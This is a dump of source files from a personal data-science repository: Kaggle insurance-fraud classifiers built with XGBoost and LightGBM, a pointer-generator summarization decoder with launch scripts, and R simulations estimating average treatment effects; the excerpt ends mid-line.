"alphanum_fraction": 0.643886148929596, "avg_line_length": 45.63934326171875, "blob_id": "34557ae126994b55fa8bd65a197d36ceb488626e", "content_id": "c01b783cbae3c622d15a80e52a065f3b39b3f4aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5692, "license_type": "no_license", "max_line_length": 112, "num_lines": 122, "path": "/Kaggle_Travelers/notebooks/XGBoost.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "##### Import packages #####\nimport numpy as np\nimport pandas as pd\nimport xgboost as xgb\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn import model_selection\nfrom skopt import BayesSearchCV\nfrom matplotlib import pyplot\nfrom xgboost import plot_importance\nimport warnings\nwarnings.filterwarnings('ignore')\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, auc\n\n##### Feature manipulation #####\ntrain = pd.read_csv(\"train_data_clean_4_grouped.csv\")\ntest = pd.read_csv(\"test_data_clean_4_grouped.csv\")\n\n# Encode gender and living status and state #####\ntrain[\"living_status\"] = pd.Categorical(train[\"living_status\"])\ntrain[\"gender\"] = np.where(train[\"gender\"].str.contains(\"M\"), 1, 0)\ntrain[\"living_status\"] = np.where(train[\"living_status\"].str.contains(\"Rent\"), 1, 0)\n\ntest[\"living_status\"] = pd.Categorical(test[\"living_status\"])\ntest[\"gender\"] = np.where(test[\"gender\"].str.contains(\"M\"), 1, 0)\ntest[\"living_status\"] = np.where(test[\"living_status\"].str.contains(\"Rent\"), 1, 0)\n\n# one-hot encoding for site of state\nstate_dummies = pd.get_dummies(test['state'], \n prefix='state', drop_first=True)\ntest = pd.concat([test, state_dummies], axis=1)\ntest.drop([\"state\"], axis=1, inplace=True)\n\n# one-hot encoding for site of state\nstate_dummies = pd.get_dummies(train['state'], \n prefix='state', drop_first=True)\ntrain = pd.concat([train, state_dummies], axis=1)\ntrain.drop([\"state\"], axis=1, inplace=True)\n\n# Drop month, day and year data, drop vehicle color, zipcode, claim_date, claim_number and SP_Index #####\ntrain.drop([\"claim_month_january\", \"claim_month_february\", \"claim_month_march\", \"claim_month_may\", \n \"claim_month_june\", \"claim_month_july\", \"claim_month_august\", \"claim_month_september\", \n \"claim_month_october\", \"claim_month_november\", \"claim_month_december\", \n \"claim_day_monday\", \"claim_day_tuesday\", \"claim_day_wednesday\", \"claim_day_thursday\", \n \"claim_day_saturday\", \"claim_day_sunday\", \"claim_year\", \"claim_day\", \n \"zip_code\", \"claim_date\", \"claim_number\", 'SP_Index', \"vehicle_color_blue\", \n \"vehicle_color_gray\", \"vehicle_color_other\", \"vehicle_color_red\", \n \"vehicle_color_silver\", \"vehicle_color_white\"], axis =1, inplace=True)\n\ntest.drop([\"claim_month_january\", \"claim_month_february\", \"claim_month_march\", \"claim_month_may\", \n \"claim_month_june\", \"claim_month_july\", \"claim_month_august\", \"claim_month_september\", \n \"claim_month_october\", \"claim_month_november\", \"claim_month_december\", \n \"claim_day_monday\", \"claim_day_tuesday\", \"claim_day_wednesday\", \"claim_day_thursday\", \n \"claim_day_saturday\", \"claim_day_sunday\", \"claim_year\", \"claim_day\", \n \"zip_code\", \"claim_date\", \"claim_number\", 'SP_Index', \"vehicle_color_blue\", \n \"vehicle_color_gray\", \"vehicle_color_other\", \"vehicle_color_red\", \n \"vehicle_color_silver\", \"vehicle_color_white\"], axis =1, inplace=True)\n\n\n# Add saftyrating/(number of past claim) feature #####\ntrain['per_saftyrating'] = train['safty_rating']/(train['past_num_of_claims']+1)\ntest['per_saftyrating'] = test['safty_rating']/(test['past_num_of_claims']+1)\n\n\n# Delete some fraud_mean variables #####\ntrain.drop([\"fraud_gender\", \"fraud_marital_status\", \"fraud_high_education_ind\", \"fraud_address_change_ind\", \n \"fraud_living_status\", \"fraud_zip_code\", \"fraud_claim_date\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_accident_site\", \"fraud_channel\", \"fraud_vehicle_category\",\n \"fraud_vehicle_color\", \"fraud_state\",\"Unem_rate\"],\n axis = 1, inplace = True)\ntest.drop([\"fraud_gender\", \"fraud_marital_status\", \"fraud_high_education_ind\", \"fraud_address_change_ind\", \n \"fraud_living_status\", \"fraud_zip_code\", \"fraud_claim_date\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_accident_site\", \"fraud_channel\", \"fraud_vehicle_category\",\n \"fraud_vehicle_color\", \"fraud_state\", \"Unem_rate\"],\n axis = 1, inplace = True)\ntrain = train.filter(regex=\"^(?!state_).*$\")\ntest = test.filter(regex=\"^(?!state_).*$\")\n\n\n\n##### Final Model #####\ny = train[\"fraud\"]\nX = train.drop(\"fraud\", 1)\nclf = xgb.XGBClassifier(max_depth=3,\n learning_rate=0.06,\n n_estimators=180,\n silent=True,\n objective='binary:logistic',\n gamma=0.35,\n min_child_weight=5,\n max_delta_step=0,\n subsample=0.8,\n colsample_bytree=0.785,\n colsample_bylevel=1,\n reg_alpha=0.01,\n reg_lambda=1,\n scale_pos_weight=1,\n seed=1440,\n missing=None)\n\n## CV AUC score\nscores = model_selection.cross_val_score(clf, X.values, y.values, cv = 6, scoring = 'roc_auc')\nprint(scores)\nprint(\"AUC: %0.4f (+/- %0.4f)\" % (scores.mean(), scores.std()))\n\n## Final prediction on the test data\nclf.fit(X, y)\ny_pred = clf.predict_proba(test)[:,1]\ntest = pd.read_csv(\"test_data_clean2.csv\")\ntest_output = {'claim_number':test['claim_number'], 'fraud':y_pred}\ntest_output = pd.DataFrame(data = test_output)\ntest_output = test_output.set_index('claim_number')\ntest_output.to_csv(\"predictions/prediction_xgboost4.csv\")\n\n## Feature importance \nplot_importance(clf)\npyplot.show()\n\n\n" }, { "alpha_fraction": 0.7075471878051758, "alphanum_fraction": 0.7452830076217651, "avg_line_length": 34, "blob_id": "cd1376166b607feda98360c36f539d64628fc746", "content_id": "cae37140a94c328282207e5730f99748408dc15e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 106, "license_type": "permissive", "max_line_length": 71, "num_lines": 3, "path": "/rbm_summarizer/start_decode.sh", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "export PYTHONPATH=`pwd`\nMODEL=$1\npython training_ptr_gen/decode.py $MODEL >& log/decode_rbmpg_500k_log &\n\n" }, { "alpha_fraction": 0.7469879388809204, "alphanum_fraction": 0.7469879388809204, "avg_line_length": 40, "blob_id": "0da869aaa6e46b753c303a8120a0e162fe86a6f2", "content_id": "b4c8c2a5974324ac0ff7e52fe0e9719eaa1d424a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 83, "license_type": "permissive", "max_line_length": 57, "num_lines": 2, "path": "/rbm_summarizer/start_train.sh", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "export PYTHONPATH=`pwd`\npython training_ptr_gen/train.py >& log/train_rbmpg_log &\n\n" }, { "alpha_fraction": 0.6712538003921509, "alphanum_fraction": 0.6926605701446533, "avg_line_length": 35.33333206176758, "blob_id": "ef6143904423a21e2532b2917b7e485c80f7aebb", "content_id": "23270633cfc86c6c37c4414e61bc2625c8134d60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 654, "license_type": "no_license", "max_line_length": 100, "num_lines": 18, "path": "/textual_causality/etm-ps/plot_lens.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "import json\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nwith open(\"save/document_lengths.json\", \"r\") as fp:\n doc_lens = json.load(fp)\n\ndoc_lens = np.array(list(doc_lens.values()))\nprint(doc_lens)\nplt.hist(doc_lens, bins = \"auto\")\nplt.title(\"Histogram of document lengths\")\nplt.savefig(\"save/doc_lens_hist.jpg\")\n\nprint(\"Summary Statistics:\")\nprint(f\"Min = {np.mean(doc_lens)}, Max = {np.max(doc_lens)}, Median = {np.median(doc_lens)}\")\nprint(f\"Standard Deviation = {np.std(doc_lens)}\")\nprint(f\"1st Quartile = {np.quantile(doc_lens, 0.25)}, 3rd Quartile = {np.quantile(doc_lens, 0.75)}\")\nprint(f\"{np.mean(doc_lens > 800)} are longer than 800.\")\n" }, { "alpha_fraction": 0.46580106019973755, "alphanum_fraction": 0.5070716142654419, "avg_line_length": 30.47445297241211, "blob_id": "2c4f48dac5ffbfb3977d7e6b7fef85e202d07692", "content_id": "3fcef3c1d165debff5a1a4498da89c9f8bbddd26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 4313, "license_type": "no_license", "max_line_length": 80, "num_lines": 137, "path": "/textual_causality/ate/ate.R", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "library(ggplot2)\nlibrary(reshape2)\nlibrary(doParallel)\nlibrary(dplyr)\n\n# this file works on the simulated data to estimate ATE\ndata <- read.csv(\"sim_data.csv\")\nhead(data)\n\n##========= Tune the parameter settings ===========##\n# gammas <- c(-2.45, -2.46, -2.47, -2.48)\n# res <- foreach(gamma = gammas, .combine = \"rbind\") %dopar% {\n# c(gamma, ate.sim.comp(data, params = c(-1, 4, gamma)))\n# }\n# res\n\nate.sim.comp <- function(data, params, seed = 2021) {\n require(rms)\n set.seed(seed)\n data$y <- rbinom(nrow(data), 1, \n plogis(params[1] * data$Treat + params[2] * data$True_PS + \n params[3]))\n \n # True ATE\n ATE.true <- mean(plogis(params[1] + params[2] * data$True_PS + params[3])) - \n mean(plogis(params[2] * data$True_PS + params[3]))\n \n # Unadjusted ATE\n ATE.unadj <- mean(data$y[data$Treat == 1]) - \n mean(data$y[data$Treat == 0])\n \n # PS Regression Adjustment\n mod.ps <- glm(y ~ Treat * rcs(Est_PS, 5), data = data, \n family = \"binomial\")\n data_trt <- data_ctr <- data\n data_trt$Treat <- 1\n data_ctr$Treat <- 0\n pred1.ps <- predict(mod.ps, newdata = data_trt, type = \"response\")\n pred0.ps <- predict(mod.ps, newdata = data_ctr, type = \"response\")\n ATE.PSReg <- mean(pred1.ps - pred0.ps)\n \n # PSS\n ps_quintile <- cut(data$Est_PS, \n breaks = c(0, quantile(data$Est_PS, p = 1:9 / 10 ), 1), \n labels = 1:10)\n table(ps_quintile, data$Treat)\n n <- nrow(data)\n nj <- table(ps_quintile)\n te_quintile <- tapply(data$y[data$Treat == 1], \n ps_quintile[data$Treat == 1], mean) - \n tapply(data$y[data$Treat == 0], \n ps_quintile[data$Treat == 0], mean)\n ATE.PSS <- sum(te_quintile * nj / n)\n \n # IPW\n w1 <- data$Treat / data$Est_PS\n w0 <- (1 - data$Treat) / (1 - data$Est_PS)\n ATE.IPW <- mean(data$y * w1) - mean(data$y * w0)\n \n # IPW2\n ATE.IPW2 <- weighted.mean(data$y, w1) - \n weighted.mean(data$y, w0)\n \n \n res <- c(params, mean(data$y), \n ATE.true, ATE.unadj, ATE.PSReg, ATE.PSS, ATE.IPW, ATE.IPW2)\n names(res) <- c(\"alpha\", \"beta\", \"gamma\", \"y.mean\", \"Truth\", \n \"Unadjusted\", \"PSReg\", \n \"PSS\", \"IPW\", \"IPW2\")\n res\n}\n\n\n##========================= Controlling mean of y ===========================##\n# to keep mean of y nearly constant\nget.param.setting <- function(param.type) {\n switch(param.type, \n c(-1, 1, -1), \n c(-1, 2, -1.6), \n c(-1, 3, -2.1), \n c(-1, 4, -2.7), \n c(-1, 5, -3.2), \n c(-1, 6, -3.75), \n c(-1, 7, -4.3), \n c(-1, 8, -4.85), \n c(-1, 9, -5.4), \n c(-1, 10, -6))\n}\nnrep <- 100\nregisterDoParallel(cores = 4)\nate_res <- c()\nfor (param.type in 1:10) {\n res <- foreach(rep = 1:nrep, .combine = \"rbind\") %dopar% {\n c(param.type, rep, \n ate.sim.comp(data, params = get.param.setting(param.type), \n seed = 2021 + param.type + rep))\n }\n ate_res <- rbind(ate_res, res)\n}\ncolnames(ate_res) <- c(\"Setting\", \"rep\", \"alpha\", \"beta\", \"gamma\", \"y.mean\", \n \"Truth\", \"Unadjusted\", \"PSReg\", \"PSS\", \"IPW\", \"IPW2\")\nwrite.csv(ate_res, file = \"../results/ate_results.csv\")\n\n\n##========================= Controlling ATE ===========================##\n# to keep ATE nearly constant\nget.param.setting2 <- function(param.type) {\n switch(param.type, \n c(-1, 1, -1), \n c(-1, 2, -1.5), \n c(-1, 3, -2.0), \n c(-1, 4, -2.47), \n c(-1, 5, -2.95), \n c(-1, 6, -3.4), \n c(-1, 7, -3.8), \n c(-1, 8, -4.15), \n c(-1, 9, -4.45), \n c(-1, 10, -4.5))\n}\n\nnrep <- 100\nregisterDoParallel(cores = 4)\nate_res <- c()\nfor (param.type in 1:10) {\n res <- foreach(rep = 1:nrep, .combine = \"rbind\") %dopar% {\n c(param.type, rep, \n ate.sim.comp(data, params = get.param.setting2(param.type), \n seed = 2021 + param.type + rep))\n }\n ate_res <- rbind(ate_res, res)\n}\ncolnames(ate_res) <- c(\"Setting\", \"rep\", \"alpha\", \"beta\", \"gamma\", \"y.mean\", \n \"Truth\", \"Unadjusted\", \"PSReg\", \"PSS\", \"IPW\", \"IPW2\")\nwrite.csv(ate_res, file = \"../results/ate_results2.csv\")\n\nate_res_print <- get.res.print(ate_res)\nwrite.csv(ate_res_print, file = \"../results/ate_results_print2.csv\")\n\n" }, { "alpha_fraction": 0.5494276881217957, "alphanum_fraction": 0.5565961599349976, "avg_line_length": 37.9504508972168, "blob_id": "172772f65d4c5bcffb138d926d04f34df74592eb", "content_id": "77e9472edaed267f4caf71a34cfb199c9905f83a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8649, "license_type": "permissive", "max_line_length": 127, "num_lines": 222, "path": "/rbm_summarizer/training_ptr_gen/decode.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "#Except for the pytorch part content of this file is copied from https://github.com/abisee/pointer-generator/blob/master/\n\nfrom __future__ import unicode_literals, print_function, division\n\nimport sys\n\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nimport os\nimport time\n\nimport torch\nfrom torch.autograd import Variable\n\nfrom data_util.batcher import Batcher\nfrom data_util.data import Vocab\nfrom data_util import data, config\nfrom data_util import utils\nfrom model import Model\nfrom data_util.utils import write_for_rouge, rouge_eval, rouge_log\nfrom train_util import get_input_from_batch, get_rbm_output_from_batch\n\n\nuse_cuda = config.use_gpu and torch.cuda.is_available()\n\nclass Beam(object):\n def __init__(self, tokens, log_probs, state, context, coverage):\n self.tokens = tokens\n self.log_probs = log_probs\n self.state = state\n self.context = context\n self.coverage = coverage\n\n def extend(self, token, log_prob, state, context, coverage):\n return Beam(tokens = self.tokens + [token],\n log_probs = self.log_probs + [log_prob],\n state = state,\n context = context,\n coverage = coverage)\n\n @property\n def latest_token(self):\n return self.tokens[-1]\n\n @property\n def avg_log_prob(self):\n return sum(self.log_probs) / len(self.tokens)\n\n\nclass BeamSearch(object):\n def __init__(self, model_file_path, device):\n model_name = os.path.basename(model_file_path)\n self._decode_dir = os.path.join(config.log_root, 'decode_%s' % (model_name))\n self._rouge_ref_dir = os.path.join(self._decode_dir, 'rouge_ref')\n self._rouge_dec_dir = os.path.join(self._decode_dir, 'rouge_dec_dir')\n for p in [self._decode_dir, self._rouge_ref_dir, self._rouge_dec_dir]:\n if not os.path.exists(p):\n os.mkdir(p)\n\n self.vocab = Vocab(config.vocab_path, config.vocab_size)\n self.batcher = Batcher(config.decode_data_path, self.vocab, mode='decode',\n batch_size=config.beam_size, single_pass=True)\n time.sleep(15)\n\n self.model = Model(model_file_path, is_eval=True)\n \n self.model.encoder = self.model.encoder.to(device)\n self.model.decoder = self.model.decoder.to(device)\n self.model.reduce_state = self.model.reduce_state.to(device)\n self.device = device\n\n def sort_beams(self, beams):\n return sorted(beams, key=lambda h: h.avg_log_prob, reverse=True)\n\n\n def decode(self):\n start = time.time()\n counter = 0\n batch = self.batcher.next_batch()\n while batch is not None:\n # Run beam search to get best Hypothesis\n best_summary = self.beam_search(batch)\n\n # Extract the output ids from the hypothesis and convert back to words\n output_ids = [int(t) for t in best_summary.tokens[1:]]\n decoded_words = data.outputids2words(output_ids, self.vocab,\n (batch.art_oovs[0] if config.pointer_gen else None))\n\n # Remove the [STOP] token from decoded_words, if necessary\n try:\n fst_stop_idx = decoded_words.index(data.STOP_DECODING)\n decoded_words = decoded_words[:fst_stop_idx]\n except ValueError:\n decoded_words = decoded_words\n\n original_abstract_sents = batch.original_abstracts_sents[0]\n\n write_for_rouge(original_abstract_sents, decoded_words, counter,\n self._rouge_ref_dir, self._rouge_dec_dir)\n counter += 1\n if counter % 1000 == 0:\n print('%d example in %d sec'%(counter, time.time() - start))\n start = time.time()\n\n batch = self.batcher.next_batch()\n\n print(\"Decoder has finished reading dataset for single_pass.\")\n print(\"Now starting ROUGE eval...\")\n results_dict = rouge_eval(self._rouge_ref_dir, self._rouge_dec_dir)\n rouge_log(results_dict, self._decode_dir)\n\n\n def beam_search(self, batch):\n #batch should have only one example\n enc_batch, enc_padding_mask, enc_lens, enc_batch_extend_vocab, extra_zeros, c_t_0, coverage_t_0 = \\\n get_input_from_batch(batch, use_cuda, self.device)\n \n # get the latent representation of the documents\n if config.add_rbm: \n latent_batch = get_rbm_output_from_batch(batch, self.vocab, use_cuda, self.device)\n else:\n latent_batch = None\n\n encoder_outputs, encoder_feature, encoder_hidden = self.model.encoder(enc_batch, enc_lens)\n s_t_0 = self.model.reduce_state(encoder_hidden)\n\n dec_h, dec_c = s_t_0 # 1 x 2*hidden_size\n dec_h = dec_h.squeeze()\n dec_c = dec_c.squeeze()\n\n #decoder batch preparation, it has beam_size example initially everything is repeated\n beams = [Beam(tokens=[self.vocab.word2id(data.START_DECODING)],\n log_probs=[0.0],\n state=(dec_h[0], dec_c[0]),\n context = c_t_0[0],\n coverage=(coverage_t_0[0] if config.is_coverage else None))\n for _ in xrange(config.beam_size)]\n results = []\n steps = 0\n while steps < config.max_dec_steps and len(results) < config.beam_size:\n latest_tokens = [h.latest_token for h in beams]\n latest_tokens = [t if t < self.vocab.size() else self.vocab.word2id(data.UNKNOWN_TOKEN) \\\n for t in latest_tokens]\n y_t_1 = Variable(torch.LongTensor(latest_tokens))\n if use_cuda:\n # y_t_1 = y_t_1.cuda()\n y_t_1 = y_t_1.to(self.device)\n all_state_h =[]\n all_state_c = []\n\n all_context = []\n\n for h in beams:\n state_h, state_c = h.state\n all_state_h.append(state_h)\n all_state_c.append(state_c)\n\n all_context.append(h.context)\n\n s_t_1 = (torch.stack(all_state_h, 0).unsqueeze(0), torch.stack(all_state_c, 0).unsqueeze(0))\n c_t_1 = torch.stack(all_context, 0)\n\n coverage_t_1 = None\n if config.is_coverage:\n all_coverage = []\n for h in beams:\n all_coverage.append(h.coverage)\n coverage_t_1 = torch.stack(all_coverage, 0)\n\n final_dist, s_t, c_t, attn_dist, p_gen, coverage_t = self.model.decoder(y_t_1, s_t_1,\n encoder_outputs, encoder_feature, enc_padding_mask, c_t_1,\n extra_zeros, enc_batch_extend_vocab, coverage_t_1, steps, latent_batch)\n log_probs = torch.log(final_dist)\n topk_log_probs, topk_ids = torch.topk(log_probs, config.beam_size * 2)\n\n dec_h, dec_c = s_t\n dec_h = dec_h.squeeze()\n dec_c = dec_c.squeeze()\n\n all_beams = []\n num_orig_beams = 1 if steps == 0 else len(beams)\n for i in xrange(num_orig_beams):\n h = beams[i]\n state_i = (dec_h[i], dec_c[i])\n context_i = c_t[i]\n coverage_i = (coverage_t[i] if config.is_coverage else None)\n\n for j in xrange(config.beam_size * 2): # for each of the top 2*beam_size hyps:\n new_beam = h.extend(token=topk_ids[i, j].item(),\n log_prob=topk_log_probs[i, j].item(),\n state=state_i,\n context=context_i,\n coverage=coverage_i)\n all_beams.append(new_beam)\n\n beams = []\n for h in self.sort_beams(all_beams):\n if h.latest_token == self.vocab.word2id(data.STOP_DECODING):\n if steps >= config.min_dec_steps:\n results.append(h)\n else:\n beams.append(h)\n if len(beams) == config.beam_size or len(results) == config.beam_size:\n break\n\n steps += 1\n\n if len(results) == 0:\n results = beams\n\n beams_sorted = self.sort_beams(results)\n\n return beams_sorted[0]\n\nif __name__ == '__main__':\n model_filename = sys.argv[1]\n # device = utils.get_devices(config.gpu_ids)\n device = utils.get_devices([7])\n # config.add_rbm=False\n beam_Search_processor = BeamSearch(model_filename, device)\n beam_Search_processor.decode()\n\n\n" }, { "alpha_fraction": 0.6354857087135315, "alphanum_fraction": 0.6477939486503601, "avg_line_length": 47.907405853271484, "blob_id": "4ea2d363c2ab6376651f223b9571241d2aa2b53c", "content_id": "dc36421247b5b74e8430c44c251179d4041ac1a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5281, "license_type": "no_license", "max_line_length": 111, "num_lines": 108, "path": "/Kaggle_Travelers/notebooks/LightGBM.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "##### Import packages #####\nimport numpy as np\nimport pandas as pd\nfrom xgboost import XGBClassifier\nfrom sklearn import model_selection\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import (RandomForestClassifier, AdaBoostClassifier, \n GradientBoostingClassifier, VotingClassifier)\nfrom mlxtend.classifier import StackingCVClassifier\nfrom lightgbm import LGBMClassifier\nimport lightgbm as lgb\nimport warnings\nwarnings.filterwarnings('ignore')\nfrom sklearn.metrics import roc_auc_score\n\n\n##### Data Manipulation #####\n# read full training data set\ndf_train = pd.read_csv('../data/train_data_clean_5_grouped.csv')\ngender_dummies = pd.get_dummies(df_train['gender'], \n prefix = 'gender', drop_first = True)\ndf_train = pd.concat([df_train, gender_dummies], axis = 1)\ndf_train.drop([\"gender\"], axis = 1, inplace = True)\n\nliving_status_dummies = pd.get_dummies(df_train['living_status'], \n prefix = 'living_status', drop_first = True)\ndf_train = pd.concat([df_train, living_status_dummies], axis = 1)\ndf_train.drop([\"living_status\"], axis = 1, inplace = True)\n\nstate_dummies = pd.get_dummies(df_train['state'], \n prefix = 'state', drop_first = True)\ndf_train = pd.concat([df_train, state_dummies], axis = 1)\ndf_train.drop([\"state\"], axis = 1, inplace = True)\n\ndf_train = df_train.sample(frac=1, random_state=5)\ndf_train['new_param'] = df_train.apply(lambda col: col['safty_rating']/(col['past_num_of_claims']+1), axis=1)\n#df_train['prct_payout'] = df_train.apply(lambda col: col['claim_est_payout']/(col['annual_income']), axis=1)\n#df_train['age_over_safety'] = df_train.apply(lambda col: col['age_of_driver']/(col['safty_rating']+1), axis=1)\ndf_train.set_index('claim_number', inplace=True)\ndf_train.sort_index(inplace=True)\ndf_train.drop(['claim_date','fraud_claim_date','fraud_zip_code',\n \"fraud_gender\", \"fraud_marital_status\", 'fraud_accident_site', 'fraud_high_education_ind',\n \"fraud_address_change_ind\", \"fraud_living_status\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_channel\", \"fraud_vehicle_category\",\n 'fraud_vehicle_color', 'fraud_state', 'SP_Index', 'Unem_rate'], axis = 1, inplace = True)\ndf_train = df_train.filter(regex=\"^(?!state_).*$\")\ndf_train = df_train.filter(regex=\"^(?!vehicle_color_).*$\")\ndf_train = df_train.filter(regex=\"^(?!claim_day_).*$\")\ndf_train = df_train.filter(regex=\"^(?!claim_month_).*$\")\n\ntrain_lgb = df_train.copy()\n\n\n# read full testing data set\ndf_test = pd.read_csv('../data/test_data_clean_5_grouped.csv')\ngender_dummies = pd.get_dummies(df_test['gender'], \n prefix = 'gender', drop_first = True)\ndf_test = pd.concat([df_test, gender_dummies], axis = 1)\ndf_test.drop([\"gender\"], axis = 1, inplace = True)\n\nliving_status_dummies = pd.get_dummies(df_test['living_status'], \n prefix = 'living_status', drop_first = True)\ndf_test = pd.concat([df_test, living_status_dummies], axis = 1)\ndf_test.drop([\"living_status\"], axis = 1, inplace = True)\n\nstate_dummies = pd.get_dummies(df_test['state'], \n prefix = 'state', drop_first = True)\ndf_test = pd.concat([df_test, state_dummies], axis = 1)\ndf_test.drop([\"state\"], axis = 1, inplace = True)\n\n#df_test = df_test.sample(frac=1, random_state=5)\ndf_test['new_param'] = df_test.apply(lambda col: col['safty_rating']/(col['past_num_of_claims']+1), axis=1)\n#df_test['prct_payout'] = df_test.apply(lambda col: col['claim_est_payout']/(col['annual_income']), axis=1)\n#df_test['age_over_safety'] = df_test.apply(lambda col: col['age_of_driver']/(col['safty_rating']+1), axis=1)\n\ndf_test.set_index('claim_number', inplace=True)\ndf_test.sort_index(inplace=True)\ndf_test.drop(['claim_date','fraud_claim_date','fraud_zip_code',\n \"fraud_gender\", \"fraud_marital_status\", 'fraud_accident_site', 'fraud_high_education_ind',\n \"fraud_address_change_ind\", \"fraud_living_status\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_channel\", \"fraud_vehicle_category\",\n 'fraud_vehicle_color', 'fraud_state', 'SP_Index', 'Unem_rate'], axis = 1, inplace = True)\ndf_test = df_test.filter(regex=\"^(?!state_).*$\")\ndf_test = df_test.filter(regex=\"^(?!vehicle_color_).*$\")\ndf_test = df_test.filter(regex=\"^(?!claim_day_).*$\")\ndf_test = df_test.filter(regex=\"^(?!claim_month_).*$\")\n\ntest_lgb = df_test.copy()\n\n\n##### Final Model #####\nlgbm_params = {'boosting_type':'gbdt', 'objective':'binary', 'num_boost_round':800,\n 'feature_fraction': .321, 'bagging_fraction':0.50, 'min_child_samples':100, \n 'min_child_weigh':35, 'max_depth':3, 'num_leaves':2, 'learing_rate':0.15,\n 'reg_alpha':5, 'reg_lambda': 1.1, 'metric':'auc', 'max_bin': 52,\n 'colsample_bytree': 0.9, 'subsample': 0.8, 'is_unbalance': 'true'\n}\n\ny_train = train_lgb[\"fraud\"]\nX_train = train_lgb.drop(\"fraud\", 1)\n\nlgbm = LGBMClassifier(**lgbm_params)\nlgbm.fit(X_train.values, y_train.values)\ny_preds = lgbm.predict_proba(test_lgb.values)[:,1]\n\ntest_lgb['fraud'] = y_preds\nresults = test_lgb.filter(['fraud'], axis=1)\nresults.to_csv('results_12_6-3.csv', header=True)" }, { "alpha_fraction": 0.5737813115119934, "alphanum_fraction": 0.5783926248550415, "avg_line_length": 26.581817626953125, "blob_id": "b6afcfba5c246c005f097009af29ba05d66b72f0", "content_id": "50d031df527f0777164c9dd80f3e7394e5e06986", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1518, "license_type": "no_license", "max_line_length": 77, "num_lines": 55, "path": "/Kaggle_Travelers/data/unemployment_data/unemp_parser.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nUnemployment Data Parsing\n\nThis script collects the unemployment statistics from\nthe 5 different states are saves a loadable dictionary\nfor easy access.\n\"\"\"\nimport pandas as pd\nimport numpy as np\n\nimport pickle\nimport re\n\nstates = ['AZ', 'CO', 'IA', 'PA', 'VA']\ncsv_files = [state.lower() + '_unemp.csv' for state in states]\n\nunemp_data = None\n\nfor csv_file, state in zip(csv_files, states):\n state_data = pd.read_csv(csv_file)\n state_data.drop(['Series ID', 'Period'], axis=1, inplace=True)\n \n state_data.rename(columns={'Year': 'year', 'Label': 'year_month', \n 'Value': 'unemp_rate'},\n inplace=True)\n state_data['state'] = state\n if unemp_data is None:\n unemp_data = state_data\n else:\n unemp_data = train_data = pd.concat([unemp_data, state_data], axis=0)\n\n\nshort_month_to_long = {\n 'Jan': 'January',\n 'Feb': 'February',\n 'Mar': 'March',\n 'Apr': 'April',\n 'May': 'May',\n 'Jun': 'June',\n 'Jul': 'July',\n 'Aug': 'August',\n 'Sep': 'September',\n 'Oct': 'October',\n 'Nov': 'November',\n 'Dec': 'December'\n }\nmonth_data = unemp_data['year_month'].values\nmonth_re_object = re.compile('\\d+\\s(\\w{3})')\nmonth_data = [short_month_to_long[re.match(rexp_object, x).group(1)]\n for x in month_data]\nunemp_data['month'] = month_data\nunemp_data.drop(['year_month'], inplace=True, axis=1)\n\nunemp_data.to_pickle('unemp_data.pkl')\n\n" }, { "alpha_fraction": 0.46317991614341736, "alphanum_fraction": 0.49623429775238037, "avg_line_length": 38.766666412353516, "blob_id": "0b847a50aff6ca639fab38a5fb203fb51b621ece", "content_id": "68f75b4fb323eebd5a2bb3097698516070b3cf29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 2390, "license_type": "no_license", "max_line_length": 81, "num_lines": 60, "path": "/textual_causality/ate/plot.R", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "library(dplyr)\nlibrary(reshape2)\nlibrary(ggplot2)\n\ngen.plot <- function(ate_res, save_path) {\n ate_res_plot <- as.data.frame(ate_res) %>% \n group_by(Setting, alpha, beta, gamma) %>%\n summarise(y.mean.sd = sd(y.mean),\n y.mean = mean(y.mean), \n Truth = mean(Truth), \n Unadjusted.sd = sd(Unadjusted), \n Unadjusted = mean(Unadjusted), \n PSReg.sd = sd(PSReg), \n PSReg = mean(PSReg), \n PSS.sd = sd(PSS),\n PSS = mean(PSS), \n IPW.sd = sd(IPW), \n IPW = mean(IPW), \n IPW2.sd = sd(IPW2),\n IPW2 = mean(IPW2))\n \n ate_res_plot <- melt(ate_res, \n id.vars = c(\"Setting\", \"rep\", \"alpha\", \"beta\", \"gamma\", \n \"y.mean\"), \n variable.name = \"Method\")\n \n ate_res_plot <- ate_res_plot %>% \n group_by(Setting, alpha, 